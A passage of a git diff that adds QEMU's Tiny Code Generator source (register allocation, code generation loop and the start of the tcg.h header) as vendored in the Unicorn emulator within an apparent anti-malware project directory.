TCGArg *args, uint16_t dead_args, + uint8_t sync_args) +{ + TCGRegSet allocated_regs; + TCGTemp *ts, *ots; + TCGType otype, itype; + + tcg_regset_set(allocated_regs, s->reserved_regs); + ots = &s->temps[args[0]]; + ts = &s->temps[args[1]]; + + /* Note that otype != itype for no-op truncation. */ + otype = ots->type; + itype = ts->type; + + /* If the source value is not in a register, and we're going to be + forced to have it in a register in order to perform the copy, + then copy the SOURCE value into its own register first. That way + we don't have to reload SOURCE the next time it is used. 
*/ + if (((NEED_SYNC_ARG(0) || ots->fixed_reg) && ts->val_type != TEMP_VAL_REG) + || ts->val_type == TEMP_VAL_MEM) { + ts->reg = tcg_reg_alloc(s, (TCGRegSet)s->tcg_target_available_regs[itype], + allocated_regs); + if (ts->val_type == TEMP_VAL_MEM) { + tcg_out_ld(s, itype, ts->reg, ts->mem_reg, ts->mem_offset); + ts->mem_coherent = 1; + } else if (ts->val_type == TEMP_VAL_CONST) { + tcg_out_movi(s, itype, ts->reg, ts->val); + ts->mem_coherent = 0; + } + s->reg_to_temp[ts->reg] = args[1]; + ts->val_type = TEMP_VAL_REG; + } + + if (IS_DEAD_ARG(0) && !ots->fixed_reg) { + /* mov to a non-saved dead register makes no sense (even with + liveness analysis disabled). */ + assert(NEED_SYNC_ARG(0)); + /* The code above should have moved the temp to a register. */ + assert(ts->val_type == TEMP_VAL_REG); + if (!ots->mem_allocated) { + temp_allocate_frame(s, args[0]); + } + tcg_out_st(s, otype, ts->reg, ots->mem_reg, ots->mem_offset); + if (IS_DEAD_ARG(1)) { + temp_dead(s, args[1]); + } + temp_dead(s, args[0]); + } else if (ts->val_type == TEMP_VAL_CONST) { + /* propagate constant */ + if (ots->val_type == TEMP_VAL_REG) { + s->reg_to_temp[ots->reg] = -1; + } + ots->val_type = TEMP_VAL_CONST; + ots->val = ts->val; + } else { + /* The code in the first if block should have moved the + temp to a register. */ + assert(ts->val_type == TEMP_VAL_REG); + if (IS_DEAD_ARG(1) && !ts->fixed_reg && !ots->fixed_reg) { + /* the mov can be suppressed */ + if (ots->val_type == TEMP_VAL_REG) { + s->reg_to_temp[ots->reg] = -1; + } + ots->reg = ts->reg; + temp_dead(s, args[1]); + } else { + if (ots->val_type != TEMP_VAL_REG) { + /* When allocating a new register, make sure to not spill the + input one. 
*/ + tcg_regset_set_reg(allocated_regs, ts->reg); + ots->reg = tcg_reg_alloc(s, (TCGRegSet)s->tcg_target_available_regs[otype], + allocated_regs); + } + tcg_out_mov(s, otype, ots->reg, ts->reg); + } + ots->val_type = TEMP_VAL_REG; + ots->mem_coherent = 0; + s->reg_to_temp[ots->reg] = args[0]; + if (NEED_SYNC_ARG(0)) { + tcg_reg_sync(s, ots->reg); + } + } +} + +static void tcg_reg_alloc_op(TCGContext *s, + const TCGOpDef *def, TCGOpcode opc, + const TCGArg *args, uint16_t dead_args, + uint8_t sync_args) +{ + TCGRegSet allocated_regs; + int i, k, nb_iargs, nb_oargs, reg; + TCGArg arg; + const TCGArgConstraint *arg_ct; + TCGTemp *ts; + TCGArg new_args[TCG_MAX_OP_ARGS]; + int const_args[TCG_MAX_OP_ARGS]; + + nb_oargs = def->nb_oargs; + nb_iargs = def->nb_iargs; + + /* copy constants */ + memcpy(new_args + nb_oargs + nb_iargs, + args + nb_oargs + nb_iargs, + sizeof(TCGArg) * def->nb_cargs); + + /* satisfy input constraints */ + tcg_regset_set(allocated_regs, s->reserved_regs); + for(k = 0; k < nb_iargs; k++) { + i = def->sorted_args[nb_oargs + k]; + arg = args[i]; + arg_ct = &def->args_ct[i]; + ts = &s->temps[arg]; + if (ts->val_type == TEMP_VAL_MEM) { + reg = tcg_reg_alloc(s, arg_ct->u.regs, allocated_regs); + tcg_out_ld(s, ts->type, reg, ts->mem_reg, ts->mem_offset); + ts->val_type = TEMP_VAL_REG; + ts->reg = reg; + ts->mem_coherent = 1; + s->reg_to_temp[reg] = arg; + } else if (ts->val_type == TEMP_VAL_CONST) { + if (tcg_target_const_match(ts->val, ts->type, arg_ct)) { + /* constant is OK for instruction */ + const_args[i] = 1; + new_args[i] = ts->val; + goto iarg_end; + } else { + /* need to move to a register */ + reg = tcg_reg_alloc(s, arg_ct->u.regs, allocated_regs); + tcg_out_movi(s, ts->type, reg, ts->val); + ts->val_type = TEMP_VAL_REG; + ts->reg = reg; + ts->mem_coherent = 0; + s->reg_to_temp[reg] = arg; + } + } + assert(ts->val_type == TEMP_VAL_REG); + if (arg_ct->ct & TCG_CT_IALIAS) { + if (ts->fixed_reg) { + /* if fixed register, we must allocate a new 
register + if the alias is not the same register */ + if (arg != args[arg_ct->alias_index]) + goto allocate_in_reg; + } else { + /* if the input is aliased to an output and if it is + not dead after the instruction, we must allocate + a new register and move it */ + if (!IS_DEAD_ARG(i)) { + goto allocate_in_reg; + } + } + } + reg = ts->reg; + if (tcg_regset_test_reg(arg_ct->u.regs, reg)) { + /* nothing to do : the constraint is satisfied */ + } else { + allocate_in_reg: + /* allocate a new register matching the constraint + and move the temporary register into it */ + reg = tcg_reg_alloc(s, arg_ct->u.regs, allocated_regs); + tcg_out_mov(s, ts->type, reg, ts->reg); + } + new_args[i] = reg; + const_args[i] = 0; + tcg_regset_set_reg(allocated_regs, reg); + iarg_end: ; + } + + /* mark dead temporaries and free the associated registers */ + for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { + if (IS_DEAD_ARG(i)) { + temp_dead(s, args[i]); + } + } + + if (def->flags & TCG_OPF_BB_END) { + tcg_reg_alloc_bb_end(s, allocated_regs); + } else { + if (def->flags & TCG_OPF_CALL_CLOBBER) { + /* XXX: permit generic clobber register list ? */ + for(reg = 0; reg < TCG_TARGET_NB_REGS; reg++) { + if (tcg_regset_test_reg(s->tcg_target_call_clobber_regs, reg)) { + tcg_reg_free(s, reg); + } + } + } + if (def->flags & TCG_OPF_SIDE_EFFECTS) { + /* sync globals if the op has side effects and might trigger + an exception. 
*/ + sync_globals(s, allocated_regs); + } + + /* satisfy the output constraints */ + tcg_regset_set(allocated_regs, s->reserved_regs); + for(k = 0; k < nb_oargs; k++) { + i = def->sorted_args[k]; + arg = args[i]; + arg_ct = &def->args_ct[i]; + ts = &s->temps[arg]; + if (arg_ct->ct & TCG_CT_ALIAS) { + reg = new_args[arg_ct->alias_index]; + } else { + /* if fixed register, we try to use it */ + reg = ts->reg; + if (ts->fixed_reg && + tcg_regset_test_reg(arg_ct->u.regs, reg)) { + goto oarg_end; + } + reg = tcg_reg_alloc(s, arg_ct->u.regs, allocated_regs); + } + tcg_regset_set_reg(allocated_regs, reg); + /* if a fixed register is used, then a move will be done afterwards */ + if (!ts->fixed_reg) { + if (ts->val_type == TEMP_VAL_REG) { + s->reg_to_temp[ts->reg] = -1; + } + ts->val_type = TEMP_VAL_REG; + ts->reg = reg; + /* temp value is modified, so the value kept in memory is + potentially not the same */ + ts->mem_coherent = 0; + s->reg_to_temp[reg] = arg; + } + oarg_end: + new_args[i] = reg; + } + } + + /* emit instruction */ + tcg_out_op(s, opc, new_args, const_args); + + /* move the outputs in the correct register if needed */ + for(i = 0; i < nb_oargs; i++) { + ts = &s->temps[args[i]]; + reg = new_args[i]; + if (ts->fixed_reg && ts->reg != reg) { + tcg_out_mov(s, ts->type, ts->reg, reg); + } + if (NEED_SYNC_ARG(i)) { + tcg_reg_sync(s, reg); + } + if (IS_DEAD_ARG(i)) { + temp_dead(s, args[i]); + } + } +} + +#ifdef TCG_TARGET_STACK_GROWSUP +#define STACK_DIR(x) (-(x)) +#else +#define STACK_DIR(x) (x) +#endif + +static int tcg_reg_alloc_call(TCGContext *s, const TCGOpDef *def, + TCGOpcode opc, const TCGArg *args, + uint16_t dead_args, uint8_t sync_args) +{ + int nb_iargs, nb_oargs, flags, nb_regs, i, reg, nb_params; + TCGArg arg; + TCGTemp *ts; + intptr_t stack_offset; + size_t call_stack_size; + tcg_insn_unit *func_addr; + int allocate_args; + TCGRegSet allocated_regs; + + arg = *args++; + + nb_oargs = arg >> 16; + nb_iargs = arg & 0xffff; + nb_params = nb_iargs; + 
+ func_addr = (tcg_insn_unit *)(intptr_t)args[nb_oargs + nb_iargs]; + flags = args[nb_oargs + nb_iargs + 1]; + + nb_regs = ARRAY_SIZE(tcg_target_call_iarg_regs); +#ifdef _UC_MSVC_ARRAY_DUMMY + // do this because msvc cannot have arrays with 0 entries. + /* ref: tcg/i386/tcg-target.c: tcg_target_call_iarg_regs, + it is added a dummy value, set back to 0. */ + nb_regs = 0; +#endif + if (nb_regs > nb_params) { + nb_regs = nb_params; + } + + /* assign stack slots first */ + call_stack_size = (nb_params - nb_regs) * sizeof(tcg_target_long); + call_stack_size = (call_stack_size + TCG_TARGET_STACK_ALIGN - 1) & + ~(TCG_TARGET_STACK_ALIGN - 1); + allocate_args = (call_stack_size > TCG_STATIC_CALL_ARGS_SIZE); + if (allocate_args) { + /* XXX: if more than TCG_STATIC_CALL_ARGS_SIZE is needed, + preallocate call stack */ + return -1; + } + + stack_offset = TCG_TARGET_CALL_STACK_OFFSET; + for(i = nb_regs; i < nb_params; i++) { + arg = args[nb_oargs + i]; +#ifdef TCG_TARGET_STACK_GROWSUP + stack_offset -= sizeof(tcg_target_long); +#endif + if (arg != TCG_CALL_DUMMY_ARG) { + ts = &s->temps[arg]; + if (ts->val_type == TEMP_VAL_REG) { + tcg_out_st(s, ts->type, ts->reg, TCG_REG_CALL_STACK, stack_offset); + } else if (ts->val_type == TEMP_VAL_MEM) { + reg = tcg_reg_alloc(s, (TCGRegSet)s->tcg_target_available_regs[ts->type], + s->reserved_regs); + /* XXX: not correct if reading values from the stack */ + tcg_out_ld(s, ts->type, reg, ts->mem_reg, ts->mem_offset); + tcg_out_st(s, ts->type, reg, TCG_REG_CALL_STACK, stack_offset); + } else if (ts->val_type == TEMP_VAL_CONST) { + reg = tcg_reg_alloc(s, (TCGRegSet)s->tcg_target_available_regs[ts->type], + s->reserved_regs); + /* XXX: sign extend may be needed on some targets */ + tcg_out_movi(s, ts->type, reg, ts->val); + tcg_out_st(s, ts->type, reg, TCG_REG_CALL_STACK, stack_offset); + } else { + return -1; + } + } +#ifndef TCG_TARGET_STACK_GROWSUP + stack_offset += sizeof(tcg_target_long); +#endif + } + + /* assign input registers */ + 
tcg_regset_set(allocated_regs, s->reserved_regs); + for(i = 0; i < nb_regs; i++) { + arg = args[nb_oargs + i]; + if (arg != TCG_CALL_DUMMY_ARG) { + ts = &s->temps[arg]; + reg = tcg_target_call_iarg_regs[i]; + tcg_reg_free(s, reg); + if (ts->val_type == TEMP_VAL_REG) { + if (ts->reg != reg) { + tcg_out_mov(s, ts->type, reg, ts->reg); + } + } else if (ts->val_type == TEMP_VAL_MEM) { + tcg_out_ld(s, ts->type, reg, ts->mem_reg, ts->mem_offset); + } else if (ts->val_type == TEMP_VAL_CONST) { + /* XXX: sign extend ? */ + tcg_out_movi(s, ts->type, reg, ts->val); + } else { + return -1; + } + tcg_regset_set_reg(allocated_regs, reg); + } + } + + /* mark dead temporaries and free the associated registers */ + for(i = nb_oargs; i < nb_iargs + nb_oargs; i++) { + if (IS_DEAD_ARG(i)) { + temp_dead(s, args[i]); + } + } + + /* clobber call registers */ + for(reg = 0; reg < TCG_TARGET_NB_REGS; reg++) { + if (tcg_regset_test_reg(s->tcg_target_call_clobber_regs, reg)) { + tcg_reg_free(s, reg); + } + } + + /* Save globals if they might be written by the helper, sync them if + they might be read. 
*/ + if (flags & TCG_CALL_NO_READ_GLOBALS) { + /* Nothing to do */ + } else if (flags & TCG_CALL_NO_WRITE_GLOBALS) { + sync_globals(s, allocated_regs); + } else { + save_globals(s, allocated_regs); + } + + tcg_out_call(s, func_addr); + + /* assign output registers and emit moves if needed */ + for(i = 0; i < nb_oargs; i++) { + arg = args[i]; + ts = &s->temps[arg]; + reg = tcg_target_call_oarg_regs[i]; + assert(s->reg_to_temp[reg] == -1); + + if (ts->fixed_reg) { + if (ts->reg != reg) { + tcg_out_mov(s, ts->type, ts->reg, reg); + } + } else { + if (ts->val_type == TEMP_VAL_REG) { + s->reg_to_temp[ts->reg] = -1; + } + ts->val_type = TEMP_VAL_REG; + ts->reg = reg; + ts->mem_coherent = 0; + s->reg_to_temp[reg] = arg; + if (NEED_SYNC_ARG(i)) { + tcg_reg_sync(s, reg); + } + if (IS_DEAD_ARG(i)) { + temp_dead(s, args[i]); + } + } + } + + return nb_iargs + nb_oargs + def->nb_cargs + 1; +} + +#ifdef CONFIG_PROFILER + +static void dump_op_count(void) +{ + int i; + + for(i = INDEX_op_end; i < NB_OPS; i++) { + qemu_log("%s %" PRId64 "\n", s->tcg_op_defs[i].name, tcg_table_op_count[i]); + } +} +#endif + + +static inline int tcg_gen_code_common(TCGContext *s, + tcg_insn_unit *gen_code_buf, + long search_pc) +{ + TCGOpcode opc; + int op_index; + const TCGOpDef *def; + const TCGArg *args; + int ret; + +#ifdef DEBUG_DISAS + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP))) { + qemu_log("OP:\n"); + tcg_dump_ops(s); + qemu_log("\n"); + } +#endif + +#ifdef CONFIG_PROFILER + s->opt_time -= profile_getclock(); +#endif + +#ifdef USE_TCG_OPTIMIZATIONS + s->gen_opparam_ptr = + tcg_optimize(s, s->gen_opc_ptr, s->gen_opparam_buf, s->tcg_op_defs); + if (s->gen_opparam_ptr == NULL) { + tcg_out_tb_finalize(s); + return -2; + } +#endif + +#ifdef CONFIG_PROFILER + s->opt_time += profile_getclock(); + s->la_time -= profile_getclock(); +#endif + + tcg_liveness_analysis(s); + +#ifdef CONFIG_PROFILER + s->la_time += profile_getclock(); +#endif + +#ifdef DEBUG_DISAS + if 
(unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP_OPT))) { + qemu_log("OP after optimization and liveness analysis:\n"); + tcg_dump_ops(s); + qemu_log("\n"); + } +#endif + + tcg_reg_alloc_start(s); + + s->code_buf = gen_code_buf; + s->code_ptr = gen_code_buf; + + tcg_out_tb_init(s); + + args = s->gen_opparam_buf; + op_index = 0; + + for(;;) { + opc = s->gen_opc_buf[op_index]; +#ifdef CONFIG_PROFILER + tcg_table_op_count[opc]++; +#endif + def = &s->tcg_op_defs[opc]; +#if 0 + printf("%s: %d %d %d\n", def->name, + def->nb_oargs, def->nb_iargs, def->nb_cargs); + // dump_regs(s); +#endif + switch(opc) { + case INDEX_op_mov_i32: + case INDEX_op_mov_i64: + tcg_reg_alloc_mov(s, def, args, s->op_dead_args[op_index], + s->op_sync_args[op_index]); + break; + case INDEX_op_movi_i32: + case INDEX_op_movi_i64: + tcg_reg_alloc_movi(s, args, s->op_dead_args[op_index], + s->op_sync_args[op_index]); + break; + case INDEX_op_debug_insn_start: + /* debug instruction */ + break; + case INDEX_op_nop: + case INDEX_op_nop1: + case INDEX_op_nop2: + case INDEX_op_nop3: + break; + case INDEX_op_nopn: + args += args[0]; + goto next; + case INDEX_op_discard: + temp_dead(s, args[0]); + break; + case INDEX_op_set_label: + tcg_reg_alloc_bb_end(s, s->reserved_regs); + tcg_out_label(s, args[0], s->code_ptr); + break; + case INDEX_op_call: + ret = tcg_reg_alloc_call(s, def, opc, args, + s->op_dead_args[op_index], + s->op_sync_args[op_index]); + if (ret == -1) { + goto the_end; + } else { + args += ret; + } + goto next; + case INDEX_op_end: + goto the_end; + default: + /* Sanity check that we've not introduced any unhandled opcodes. 
*/ + if (def->flags & TCG_OPF_NOT_PRESENT) { + goto the_end; + } + /* Note: in order to speed up the code, it would be much + faster to have specialized register allocator functions for + some common argument patterns */ + tcg_reg_alloc_op(s, def, opc, args, s->op_dead_args[op_index], + s->op_sync_args[op_index]); + break; + } + args += def->nb_args; + next: + if (search_pc >= 0 && (size_t)search_pc < tcg_current_code_size(s)) { + return op_index; + } + op_index++; +#ifndef NDEBUG + check_regs(s); +#endif + } + the_end: + /* Generate TB finalization at the end of block */ + tcg_out_tb_finalize(s); + return -1; +} + +int tcg_gen_code(TCGContext *s, tcg_insn_unit *gen_code_buf) // qq +{ + int ret; +#ifdef CONFIG_PROFILER + { + int n; + n = (s->gen_opc_ptr - s->gen_opc_buf); + s->op_count += n; + if (n > s->op_count_max) + s->op_count_max = n; + + s->temp_count += s->nb_temps; + if (s->nb_temps > s->temp_count_max) + s->temp_count_max = s->nb_temps; + } +#endif + + //printf("====== before gen code\n"); + //tcg_dump_ops(s); + ret = tcg_gen_code_common(s, gen_code_buf, -1); // qq + if (ret == -2) { + return -1; + } + + //printf("====== after gen code\n"); + //tcg_dump_ops(s); + + /* flush instruction cache */ + flush_icache_range((uintptr_t)s->code_buf, (uintptr_t)s->code_ptr); + + return tcg_current_code_size(s); +} + +/* Return the index of the micro operation such as the pc after is < + offset bytes from the start of the TB. The contents of gen_code_buf must + not be changed, though writing the same values is ok. + Return -1 if not found. 
*/ +int tcg_gen_code_search_pc(TCGContext *s, tcg_insn_unit *gen_code_buf, + long offset) +{ + return tcg_gen_code_common(s, gen_code_buf, offset); +} + +#ifdef CONFIG_PROFILER +void tcg_dump_info(FILE *f, fprintf_function cpu_fprintf) +{ +#if 0 + TCGContext *s = &tcg_ctx; + int64_t tot; + + tot = s->interm_time + s->code_time; + cpu_fprintf(f, "JIT cycles %" PRId64 " (%0.3f s at 2.4 GHz)\n", + tot, tot / 2.4e9); + cpu_fprintf(f, "translated TBs %" PRId64 " (aborted=%" PRId64 " %0.1f%%)\n", + s->tb_count, + s->tb_count1 - s->tb_count, + s->tb_count1 ? (double)(s->tb_count1 - s->tb_count) / s->tb_count1 * 100.0 : 0); + cpu_fprintf(f, "avg ops/TB %0.1f max=%d\n", + s->tb_count ? (double)s->op_count / s->tb_count : 0, s->op_count_max); + cpu_fprintf(f, "deleted ops/TB %0.2f\n", + s->tb_count ? + (double)s->del_op_count / s->tb_count : 0); + cpu_fprintf(f, "avg temps/TB %0.2f max=%d\n", + s->tb_count ? + (double)s->temp_count / s->tb_count : 0, + s->temp_count_max); + + cpu_fprintf(f, "cycles/op %0.1f\n", + s->op_count ? (double)tot / s->op_count : 0); + cpu_fprintf(f, "cycles/in byte %0.1f\n", + s->code_in_len ? (double)tot / s->code_in_len : 0); + cpu_fprintf(f, "cycles/out byte %0.1f\n", + s->code_out_len ? (double)tot / s->code_out_len : 0); + if (tot == 0) + tot = 1; + cpu_fprintf(f, " gen_interm time %0.1f%%\n", + (double)s->interm_time / tot * 100.0); + cpu_fprintf(f, " gen_code time %0.1f%%\n", + (double)s->code_time / tot * 100.0); + cpu_fprintf(f, "optim./code time %0.1f%%\n", + (double)s->opt_time / (s->code_time ? s->code_time : 1) + * 100.0); + cpu_fprintf(f, "liveness/code time %0.1f%%\n", + (double)s->la_time / (s->code_time ? s->code_time : 1) * 100.0); + cpu_fprintf(f, "cpu_restore count %" PRId64 "\n", + s->restore_count); + cpu_fprintf(f, " avg cycles %0.1f\n", + s->restore_count ? 
(double)s->restore_time / s->restore_count : 0); + + dump_op_count(); +#endif +} +#else +void tcg_dump_info(FILE *f, fprintf_function cpu_fprintf) +{ + cpu_fprintf(f, "[TCG profiler not compiled]\n"); +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.h new file mode 100644 index 0000000..54486e5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.h @@ -0,0 +1,1012 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#ifndef TCG_H +#define TCG_H + +#include "qemu-common.h" +#include "qemu/bitops.h" +#include "tcg-target.h" +#include "exec/exec-all.h" + +#include "uc_priv.h" + +/* Default target word size to pointer size. 
*/ +#ifndef TCG_TARGET_REG_BITS +# if UINTPTR_MAX == UINT32_MAX +# define TCG_TARGET_REG_BITS 32 +# elif UINTPTR_MAX == UINT64_MAX +# define TCG_TARGET_REG_BITS 64 +# else +# error Unknown pointer size for tcg target +# endif +#endif + +#if TCG_TARGET_REG_BITS == 32 +typedef int32_t tcg_target_long; +typedef uint32_t tcg_target_ulong; +#define TCG_PRIlx PRIx32 +#define TCG_PRIld PRId32 +#elif TCG_TARGET_REG_BITS == 64 +typedef int64_t tcg_target_long; +typedef uint64_t tcg_target_ulong; +#define TCG_PRIlx PRIx64 +#define TCG_PRIld PRId64 +#else +#error unsupported +#endif + +#if TCG_TARGET_NB_REGS <= 32 +typedef uint32_t TCGRegSet; +#elif TCG_TARGET_NB_REGS <= 64 +typedef uint64_t TCGRegSet; +#else +#error unsupported +#endif + +#if TCG_TARGET_REG_BITS == 32 +/* Turn some undef macros into false macros. */ +#define TCG_TARGET_HAS_trunc_shr_i32 0 +#define TCG_TARGET_HAS_div_i64 0 +#define TCG_TARGET_HAS_rem_i64 0 +#define TCG_TARGET_HAS_div2_i64 0 +#define TCG_TARGET_HAS_rot_i64 0 +#define TCG_TARGET_HAS_ext8s_i64 0 +#define TCG_TARGET_HAS_ext16s_i64 0 +#define TCG_TARGET_HAS_ext32s_i64 0 +#define TCG_TARGET_HAS_ext8u_i64 0 +#define TCG_TARGET_HAS_ext16u_i64 0 +#define TCG_TARGET_HAS_ext32u_i64 0 +#define TCG_TARGET_HAS_bswap16_i64 0 +#define TCG_TARGET_HAS_bswap32_i64 0 +#define TCG_TARGET_HAS_bswap64_i64 0 +#define TCG_TARGET_HAS_neg_i64 0 +#define TCG_TARGET_HAS_not_i64 0 +#define TCG_TARGET_HAS_andc_i64 0 +#define TCG_TARGET_HAS_orc_i64 0 +#define TCG_TARGET_HAS_eqv_i64 0 +#define TCG_TARGET_HAS_nand_i64 0 +#define TCG_TARGET_HAS_nor_i64 0 +#define TCG_TARGET_HAS_deposit_i64 0 +#define TCG_TARGET_HAS_movcond_i64 0 +#define TCG_TARGET_HAS_add2_i64 0 +#define TCG_TARGET_HAS_sub2_i64 0 +#define TCG_TARGET_HAS_mulu2_i64 0 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i64 0 +#define TCG_TARGET_HAS_mulsh_i64 0 +/* Turn some undef macros into true macros. 
*/ +#define TCG_TARGET_HAS_add2_i32 1 +#define TCG_TARGET_HAS_sub2_i32 1 +#endif + +#ifndef TCG_TARGET_deposit_i32_valid +#define TCG_TARGET_deposit_i32_valid(ofs, len) 1 +#endif +#ifndef TCG_TARGET_deposit_i64_valid +#define TCG_TARGET_deposit_i64_valid(ofs, len) 1 +#endif + +/* Only one of DIV or DIV2 should be defined. */ +#if defined(TCG_TARGET_HAS_div_i32) +#define TCG_TARGET_HAS_div2_i32 0 +#elif defined(TCG_TARGET_HAS_div2_i32) +#define TCG_TARGET_HAS_div_i32 0 +#define TCG_TARGET_HAS_rem_i32 0 +#endif +#if defined(TCG_TARGET_HAS_div_i64) +#define TCG_TARGET_HAS_div2_i64 0 +#elif defined(TCG_TARGET_HAS_div2_i64) +#define TCG_TARGET_HAS_div_i64 0 +#define TCG_TARGET_HAS_rem_i64 0 +#endif + +/* For 32-bit targets, some sort of unsigned widening multiply is required. */ +#if TCG_TARGET_REG_BITS == 32 \ + && !(defined(TCG_TARGET_HAS_mulu2_i32) \ + || defined(TCG_TARGET_HAS_muluh_i32)) +# error "Missing unsigned widening multiply" +#endif + +typedef enum TCGOpcode { +#define DEF(name, oargs, iargs, cargs, flags) INDEX_op_ ## name, +#include "tcg-opc.h" +#undef DEF + NB_OPS, +} TCGOpcode; + +#define tcg_regset_clear(d) (d) = 0 +#define tcg_regset_set(d, s) (d) = (s) +#define tcg_regset_set32(d, reg, val32) (d) |= (val32) << (reg) +#define tcg_regset_set_reg(d, r) (d) |= 1L << (r) +#define tcg_regset_reset_reg(d, r) (d) &= ~(1L << (r)) +#define tcg_regset_test_reg(d, r) (((d) >> (r)) & 1) +#define tcg_regset_or(d, a, b) (d) = (a) | (b) +#define tcg_regset_and(d, a, b) (d) = (a) & (b) +#define tcg_regset_andnot(d, a, b) (d) = (a) & ~(b) +#define tcg_regset_not(d, a) (d) = ~(a) + +#ifndef TCG_TARGET_INSN_UNIT_SIZE +# error "Missing TCG_TARGET_INSN_UNIT_SIZE" +#elif TCG_TARGET_INSN_UNIT_SIZE == 1 +typedef uint8_t tcg_insn_unit; +#elif TCG_TARGET_INSN_UNIT_SIZE == 2 +typedef uint16_t tcg_insn_unit; +#elif TCG_TARGET_INSN_UNIT_SIZE == 4 +typedef uint32_t tcg_insn_unit; +#elif TCG_TARGET_INSN_UNIT_SIZE == 8 +typedef uint64_t tcg_insn_unit; +#else +/* The port better have 
done this. */ +#endif + + +typedef struct TCGRelocation { + struct TCGRelocation *next; + int type; + tcg_insn_unit *ptr; + intptr_t addend; +} TCGRelocation; + +typedef struct TCGLabel { + int has_value; + union { + uintptr_t value; + tcg_insn_unit *value_ptr; + TCGRelocation *first_reloc; + } u; +} TCGLabel; + +typedef struct TCGPool { + struct TCGPool *next; + int size; + uint8_t QEMU_ALIGN(8, data[0]); +} TCGPool; + +#define TCG_POOL_CHUNK_SIZE 32768 + +#define TCG_MAX_LABELS 512 + +#define TCG_MAX_TEMPS 512 + +/* when the size of the arguments of a called function is smaller than + this value, they are statically allocated in the TB stack frame */ +#define TCG_STATIC_CALL_ARGS_SIZE 128 + +typedef enum TCGType { + TCG_TYPE_I32, + TCG_TYPE_I64, + TCG_TYPE_COUNT, /* number of different types */ + + /* An alias for the size of the host register. */ +#if TCG_TARGET_REG_BITS == 32 + TCG_TYPE_REG = TCG_TYPE_I32, +#else + TCG_TYPE_REG = TCG_TYPE_I64, +#endif + + /* An alias for the size of the native pointer. */ +#if UINTPTR_MAX == UINT32_MAX + TCG_TYPE_PTR = TCG_TYPE_I32, +#else + TCG_TYPE_PTR = TCG_TYPE_I64, +#endif + + /* An alias for the size of the target "long", aka register. */ +#if TARGET_LONG_BITS == 64 + TCG_TYPE_TL = TCG_TYPE_I64, +#else + TCG_TYPE_TL = TCG_TYPE_I32, +#endif +} TCGType; + +/* Constants for qemu_ld and qemu_st for the Memory Operation field. */ +typedef enum TCGMemOp { + MO_8 = 0, + MO_16 = 1, + MO_32 = 2, + MO_64 = 3, + MO_SIZE = 3, /* Mask for the above. */ + + MO_SIGN = 4, /* Sign-extended, otherwise zero-extended. */ + + MO_BSWAP = 8, /* Host reverse endian. */ +#ifdef HOST_WORDS_BIGENDIAN + MO_LE = MO_BSWAP, + MO_BE = 0, +#else + MO_LE = 0, + MO_BE = MO_BSWAP, +#endif +#ifdef TARGET_WORDS_BIGENDIAN + MO_TE = MO_BE, +#else + MO_TE = MO_LE, +#endif + + /* Combinations of the above, for ease of use. 
*/ + MO_UB = MO_8, + MO_UW = MO_16, + MO_UL = MO_32, + MO_SB = MO_SIGN | MO_8, + MO_SW = MO_SIGN | MO_16, + MO_SL = MO_SIGN | MO_32, + MO_Q = MO_64, + + MO_LEUW = MO_LE | MO_UW, + MO_LEUL = MO_LE | MO_UL, + MO_LESW = MO_LE | MO_SW, + MO_LESL = MO_LE | MO_SL, + MO_LEQ = MO_LE | MO_Q, + + MO_BEUW = MO_BE | MO_UW, + MO_BEUL = MO_BE | MO_UL, + MO_BESW = MO_BE | MO_SW, + MO_BESL = MO_BE | MO_SL, + MO_BEQ = MO_BE | MO_Q, + + MO_TEUW = MO_TE | MO_UW, + MO_TEUL = MO_TE | MO_UL, + MO_TESW = MO_TE | MO_SW, + MO_TESL = MO_TE | MO_SL, + MO_TEQ = MO_TE | MO_Q, + + MO_SSIZE = MO_SIZE | MO_SIGN, +} TCGMemOp; + +typedef tcg_target_ulong TCGArg; + +/* Define a type and accessor macros for variables. Using pointer types + is nice because it gives some level of type safely. Converting to and + from intptr_t rather than int reduces the number of sign-extension + instructions that get implied on 64-bit hosts. Users of tcg_gen_* don't + need to know about any of this, and should treat TCGv as an opaque type. + In addition we do typechecking for different types of variables. TCGv_i32 + and TCGv_i64 are 32/64-bit variables respectively. TCGv and TCGv_ptr + are aliases for target_ulong and host pointer sized values respectively. 
